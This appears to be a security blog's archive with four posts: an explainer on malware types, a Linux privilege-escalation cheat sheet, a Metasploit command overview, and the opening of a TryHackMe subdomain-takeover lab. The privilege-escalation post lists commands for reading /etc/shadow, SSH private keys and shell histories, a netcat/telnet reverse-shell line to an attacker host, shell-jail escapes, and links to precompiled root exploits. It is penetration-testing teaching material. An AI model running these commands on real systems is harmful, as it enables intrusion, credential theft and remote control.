Wednesday, 4 September 2024

Malware-and-its-types

What is Malware? And its Types

Malware is malicious software and refers to any software that is designed to cause harm to computer systems, networks, or users. Malware can take many forms. Individuals and organizations need to be aware of the different types of malware and take steps to protect their systems, such as using antivirus software, keeping software and systems up-to-date, and being cautious when opening email attachments or downloading software from the internet.

What is Malware?

Malware is software that gets into the system without user consent to steal the user’s private and confidential data, including bank details and passwords. They also generate annoying pop-up ads and change system settings. Malware includes computer viruses, worms, Trojan horses, ransomware, spyware, and other malicious programs. Individuals and organizations need to be aware of the different types of malware and take steps to protect their systems, such as using antivirus software, keeping software and systems up-to-date, and being cautious when opening email attachments or downloading software from the internet.

What Does Malware Do?

Malware is designed to harm and exploit your computer or network. It can steal sensitive information like passwords and credit card numbers, disrupt your system’s operations, and even allow attackers to gain unauthorized access to your device. Some types of malware, such as ransomware, encrypt your files and demand payment to unlock them, while spyware monitors your activities and sends the information back to the attacker. Additionally, malware can spread to other devices on the same network, making it a significant threat. Protecting your devices with up-to-date antivirus software and being cautious about your open links and attachments can help mitigate these risks.

Why Do Cybercriminals Use Malware?

Cybercriminals use malware, including all forms of malicious software including viruses, for various purposes.
Using deception to induce a victim to provide personal information for identity theft
Theft of customer credit card information or other financial information
Taking over several computers and using them to launch denial-of-service attacks against other networks
Using infected computers to mine for cryptocurrencies like bitcoin.

Types of Malware

Viruses – A Virus is a malicious executable code attached to another executable file. The virus spreads when an infected file is passed from system to system. Viruses can be harmless or they can modify or delete data. Opening a file can trigger a virus. Once a program virus is active, it will infect other programs on the computer.

Worms – Worms replicate themselves on the system, attaching themselves to different files and looking for pathways between computers, such as computer network that shares common file storage areas. Worms usually slow down networks. A virus needs a host program to run but worms can run by themselves. After a worm affects a host, it is able to spread very quickly over the network.

Trojan horse – A Trojan horse is malware that carries out malicious operations under the appearance of a desired operation such as playing an online game. A Trojan horse varies from a virus because the Trojan binds itself to non-executable files, such as image files, and audio files.

Types of Malware

Ransomware – Ransomware grasps a computer system or the data it contains until the victim makes a payment. Ransomware encrypts data in the computer with a key that is unknown to the user. The user has to pay a ransom (price) to the criminals to retrieve data. Once the amount is paid the victim can resume using his/her system.

Adware – It displays unwanted ads and pop-ups on the computer. It comes along with software downloads and packages. It generates revenue for the software distributer by displaying ads.

Spyware – Its purpose is to steal private information from a computer system for a third party. Spyware collects information and sends it to the hacker.

Logic Bombs – A logic bomb is a malicious program that uses a trigger to activate the malicious code. The logic bomb remains non-functioning until that trigger event happens. Once triggered, a logic bomb implements a malicious code that causes harm to a computer. Cybersecurity specialists recently discovered logic bombs that attack and destroy the hardware components in a workstation or server including the cooling fans, hard drives, and power supplies. The logic bomb overdrives these devices until they overheat or fail.

Rootkits – A rootkit modifies the OS to make a backdoor. Attackers then use the backdoor to access the computer distantly. Most rootkits take advantage of software vulnerabilities to modify system files.

Backdoors – A backdoor bypasses the usual authentication used to access a system. The purpose of the backdoor is to grant cyber criminals future access to the system even if the organization fixes the original vulnerability used to attack the system.

Keyloggers – Keylogger records everything the user types on his/her computer system to obtain passwords and other sensitive information and send them to the source of the keylogging program.

How To Know If Our Devices Are Infected With Malware?

Performing poorly on the computer by execution.
When your web browser directs you to a website you didn’t intend to visit, this is known as a browser redirect.
Warnings about infections are frequently accompanied by offers to buy a product to treat them.
Having trouble starting or shutting down your computer.
Persistent pop-up ads.

How To Protect From Malware?

Update your operating system and software. Install updates as soon as they become available because cybercriminals search for vulnerabilities in out-of-date or outdated software.
Never click on a popup’s link. Simply click the “X” in the message’s upper corner to close it and leave the page that generated it.
Don’t install too many apps on your devices. Install only the apps you believe you will regularly use and need.
Be cautious when using the internet.
Do not click on unidentified links. If a link seems suspicious, avoid clicking it whether it comes from an email, social networking site, or text message.
Choose the websites you visit wisely. Use a safe search plug-in and try to stick to well-known and reputable websites to avoid any that might be malicious without your knowledge.
Emails requesting personal information should be avoided. Do not click a link in an email that appears to be from your bank and asks you to do so in order to access your account or reset your password. Log in immediately at your online banking website.

How To Remove Malware?

A large number of security software programs are made to both find and stop malware as well as to eliminate it from infected systems. An antimalware tool that handles malware detection and removal is Malwarebytes. Malware can be eliminated from Windows, macOS, Android, and iOS operating systems. A user’s registry files, currently running programs, hard drives, and individual files can all be scanned by Malwarebytes. Malware can then be quarantined and removed if it is found. Users cannot, however, set automatic scanning schedules like they can with some other tools.

Tools Used to Remove Malware

Malwarebytes
SUPERAntiSpyware
Malicious Software Removal Tool (MSRT)
Bitdefender Antivirus Free Edition
Adaware Antivirus Free
Avast Free Mac Security

Advantages of Detecting and Removing Malware

Improved Security: By detecting and removing malware, individuals, and organizations can improve the security of their systems and reduce the risk of future infections.
Prevent Data Loss: Malware can cause data loss, and by removing it, individuals and organizations can protect their important files and information.
Protect Reputation: Malware can cause harm to a company’s reputation, and by detecting and removing it, individuals and organizations can protect their image and brand.
Increased Productivity: Malware can slow down systems and make them less efficient, and by removing it, individuals and organizations can increase the productivity of their systems and employees.

Disadvantages of Detecting and Removing Malware

Time-Consuming: The process of detecting and removing malware can be time-consuming and require specialized tools and expertise.
Cost: Antivirus software and other tools required to detect and remove malware can be expensive for individuals and organizations.
False Positives: Malware detection and removal tools can sometimes result in false positives, causing unnecessary alarm and inconvenience.
Difficulty: Malware is constantly evolving, and the process of detecting and removing it can be challenging and require specialized knowledge and expertise.
Risk of Data Loss: Some malware removal tools can cause unintended harm, resulting in data loss or system instability.

Conclusion

In conclusion, malware include significant risks to both individuals and organizations, requiring proactive measures for protection and removal. Utilizing a combination of antivirus and anti-malware tools with software updates can effectively protect systems. While detecting and removing malware can be time-consuming and costly, the benefits of enhanced security, data protection, and increased productivity.

Monday, 26 February 2024

Basic Linux Privilege Escalation

Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more "things" to look for. It's just a basic & rough guide. Not every command will work for each system as Linux varies so much. "It" will not jump off the screen - you've to hunt for that "little thing" as "the devil is in the detail".

Enumeration is the key.

(Linux) privilege escalation is all about:

Collect - Enumeration, more enumeration and some more enumeration.
Process - Sort through data, analyse and prioritisation.
Search - Know what to search for and where to find the exploit code.
Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box".
Try - Get ready for (lots of) trial and error.

Operating System

What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
  cat /etc/lsb-release      # Debian based
  cat /etc/redhat-release   # Redhat based

What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

1	`lpstat -a`

Applications & Services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services

Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!

1 2	`ps aux \| grep root ps -ef \| grep root`

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla

Communications & Networking

What NIC(s) does the system have? Is it connected to another network?

1
2
3

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

Whats cached? IP and/or MAC addresses

1
2
3

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

1	`tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21`

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can you interact with the system?

1
2
3

nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!

Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

Is port forwarding possible? Redirect and interact with traffic from another view

Note: http://www.boutell.com/rinetd/

Note: http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

Note: http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip

Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

1	`FPipe.exe -l 80 -r 80 -s 80 192.168.1.7`

Note: ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

1 2	`ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port`

Note: mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

1
2
3

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely

1 2	`ssh -D 127.0.0.1:9050 -N [username]@[ip] proxychains ifconfig`

Confidential Information & Users

Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

id
who
w
last
cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directorie(s)? If it's possible to access

1 2	`ls -ahlR /root/ ls -ahlR /home/`

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

1
2
3

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found?

cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems

Which configuration files can be written in /etc/? Able to reconfigure a service?

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null       # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null        # Other

find /etc/ -readable -type f 2>/dev/null               # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/ ?

ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?

ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with "Local File Includes"!)

cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/

If commands are limited, you break out of the "jail" shell?

1
2
3

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

How are file-systems mounted?

1 2	`mount df -h`

Are there any unmounted file-systems?

1	`cat /etc/fstab`

What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID

find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm

find / -writable -type d 2>/dev/null      # world-writeable folders
find / -perm -222 -type d 2>/dev/null     # world-writeable folders
find / -perm -o w -type d 2>/dev/null     # world-writeable folders

find / -perm -o x -type d 2>/dev/null     # world-executable folders

find / \( -perm -o w -perm -o x \) -type d 2>/dev/null   # world-writeable & executable folders

Any "problem" files? Word-writeable, "nobody" files

1 2	`find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files`

Preparation & Finding Exploit Code

What development tools/languages are installed/supported?

find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

How can files be uploaded?

find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

Finding exploit code

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

Finding more information regarding the exploit

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk

http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Mitigations

Is any of the above information easy to find?

Try doing it! Setup a cron job which automates script(s) and/or 3rd party products

Is the system fully patched?

Kernel, operating system, all applications, their plugins and web services

1 2	`apt-get update && apt-get upgrade yum update`

Are services running with the minimum level of privileges required?

For example, do you need to run MySQL as root?

Scripts Can any of this be automated?!

http://pentestmonkey.net/tools/unix-privesc-check/

http://labs.portcullis.co.uk/application/enum4linux/

http://bastille-linux.sourceforge.net

Other (quick) guides & Links

Enumeration

http://www.0daysecurity.com/penetration-testing/enumeration.html

http://www.microloft.co.uk/hacking/hacking3.htm

Misc

http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf

http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

Monday, 27 November 2023

Metasploit Tutorial for Beginners

The Metasploit project is an open-source penetration testing platform that enables you to find and exploit vulnerabilities. In 2003, H.D. Moore created Metasploit as a portable network tool. On October 21, 2009, the Metasploit project was acquired by Rapid7.

The Metasploit project helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. The Metasploit project includes sub-project like Metasploit Framework and its commercial counterparts: Metasploit Pro, Express, Community, and Nexpose Ultimate.

Minimum System Requirements:

2 GHz+ Processor
4 GB RAM (8 GB recommended)
1 GB Disk space (50 GB recommended)

Supported Operating System:

Windows Server 2008, Server 2012
Windows 8.1, Windows 10
Red Hat Enterprise Linux 5.10, 6.5, 7.1 or later
Ubuntu Linux 14.04 or 16.04 LTS(recommended)

Required Browser version:

Google Chrome(latest)
Mozilla Firefox(latest)
Microsoft internet explorer 11

Basic Terms of Metasploit

Vulnerability: A vulnerability is a weakness which can be exploited by an attacker to perform unauthorized avv. .hvctions with a computer system. A vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.

Exploit: Exploit is a piece of code, or a chunk of data, or a sequence of commands that take the advantage of a vulnerability present in a computer system to cause unintended behavior to occur on a computer system such as giving unauthorized access to a system or allowing privilege escalation.

Payload: The payload is the part of the private user text which could also contain malware such as worms or viruses which performs the malicious action; deleting data, sending spam or encrypting data.

Auxiliary: Auxiliaries are modules present in Metasploit that are used to perform scanning, sniffing, and fuzzing. Auxiliary modules are not useful to give you a shell, but they are extremely useful to brute force passwords or for scanning vulnerabilities.

Post: Post modules are used for post exploitation that is used on a compromised target machine to gather evidence or pivot deep within the network.

Encoders: Encoder module is used to ensure the payload makes it to the destination.

Nops: Nops are used to keep the size of the payload consistent across exploit attempts.

A cheat sheet of Basic Commands

To start the Metasploit framework we type msfconsole on the terminal. We are greeted by a banner; it spawns a banner every time we start the msfconsole.

msfconsole

After starting the Metasploit framework, we can check for the basic commands by using “help” command.

msf > help

Core Commands:

? / help: Display the summary of commands that can be used in msfconsole.
banner: Change and display banner in msfconsole.
cd: Change the current working directory.
color: Enable or disable the color output of Metasploit. It has 3 options “true”, “false” and auto.
connect: netcat like function to connect to a host machine build into msfconsole.
exit: Exit the Metasploit console.
get: Gets the value of a context-specific variable
getg: Gets the value of global variable
grep: It matches a given pattern from the output of another msfconsole command
history: Shows command that are previously used in Metasploit
irb: Opens a live ruby interactive shell
load: Loads a Metasploit plugin
quit: Exit the Metasploit console
route: It allows you to route sockets through a session or ‘comm’, providing basic pivoting capabilities
save: This command allows you to save your current environment and settings
sessions: This command allows you to list, interact, and kill spawned sessions
set: This command allows you to configure Framework options and parameters for the current module that is selected on the console.
setg: This command is used to set global variables within msfconsole
sleep: Do nothing for the specified number of seconds
spool: It allows a user to save the output of Metasploit console to a specified file
threads: View and manipulate background threads
unload: unloads a previously loaded plugin and removes any extended commands
unset: It removes a parameter previously configured with set
unsetg: It removes a global variable inside msfconsole
version: Show the framework and console library version numbers

Module Commands:

advanced: It is used to further fine-tune a module, ‘show advanced’ displays a more advanced option for a module.
back: Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the back command to move out of the current context.
info: It provides detailed information about a particular module including all options, targets, and other information.
loadpath: It loads a third-party module tree for the path.
options: It shows you the available parameters for an exploit.
popm: It pops the pushed module from the top of the module stack.
previous: It sets the previously loaded module as the current module.
pushm: This command pushes the current module on to the stack.
reload_all: It reloads all modules from all defined module paths.
search: It searchers module names and descriptions
show: This command displays modules of a given type, or display all modules.
use: It is used to select a particular module.

Job Commands:

handler: It starts a payload handler in the background.
Jobs: It is used to list jobs running in the background and terminate them.
kill: It kills any running job.
rename_job: It is used to rename a job

Resource Script Commands:

makerc: It saves commands entered to a specified rc file.
Resource: It runs all the command stored in the rc file.

Developer Commands:

edit: This command is used to edit the currently selected module.
log: It displays framework.log starting from the bottom.
reload_lib: This command is used to reload one or more library files from specified paths.

Database Backend Commands:

db_connect: It is used to connect to an existing database.
db_disconnect: It is used to disconnect from the current database instance.
db_export: It is used to export a file containing the contents of the database.
db_import: It is used to import a scan result file.
db_rebuild_cache: It is used to rebuild the database-stored module cache.
db_status: It shows the name of the currently connected database.
hosts: It lists all hosts in the database.
loot: It lists all loot in the database.
notes: It lists all notes in the database.
services: It lists all services in the database.
vulns: It lists all vulnerabilities in the database.
workspace: It helps to switch between database workspaces.

To see all the payloads that are available on the Metasploit framework we use command “show payloads”. It lists all the available payloads in alphabetic order.

msf > show payloads

To see all the exploits that are available on the Metasploit framework we use command “show exploits”. It lists all the available payloads in alphabetic order and it also shows the date it was disclosed and the rank of the exploit ranging from “Excellent-average”.

msf > show exploits

To see the list of all the auxiliaries available in Metasploit framework we can use the command “show auxiliary”. As mentioned earlier, auxiliary modules include scanners, denial of service modules, fuzzers, and more.

msf > show auxiliary

To see the list of all the post-exploitation modules available in Metasploit framework we can use command “show post”. Post modules are used for post exploitation that is used on a compromised target machine to gather evidence or pivot deep within the network.

msf > show post

To see the list of all the encoders available in Metasploit framework we can use the command “show encoder”. These are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.

msf > show encoders

To see the list of all the nops available in Metasploit framework we can use the command “show nops”. They are used to keep the size of payload consistent across exploit attempts.

msf > show nops

Wednesday, 22 November 2023

Take Over Lab from TryHackMe Platform

https://tryhackme.com/room/takeover

TakeOver

This challenge revolves around subdomain enumeration.

Task 1 Help Us

Hello there,

I am the CEO and one of the co-founders of futurevera.thm. In Futurevera, we believe that the future is in space. We do a lot of space research and write blogs about it. We used to help students with space questions, but we are rebuilding our support.

Recently blackhat hackers approached us saying they could takeover and are asking us for a big ransom. Please help us to find what they can takeover.

Our website is located at https://futurevera.thm

Hint: Don't forget to add the 10.10.49.201 in /etc/hosts for futurevera.thm ; )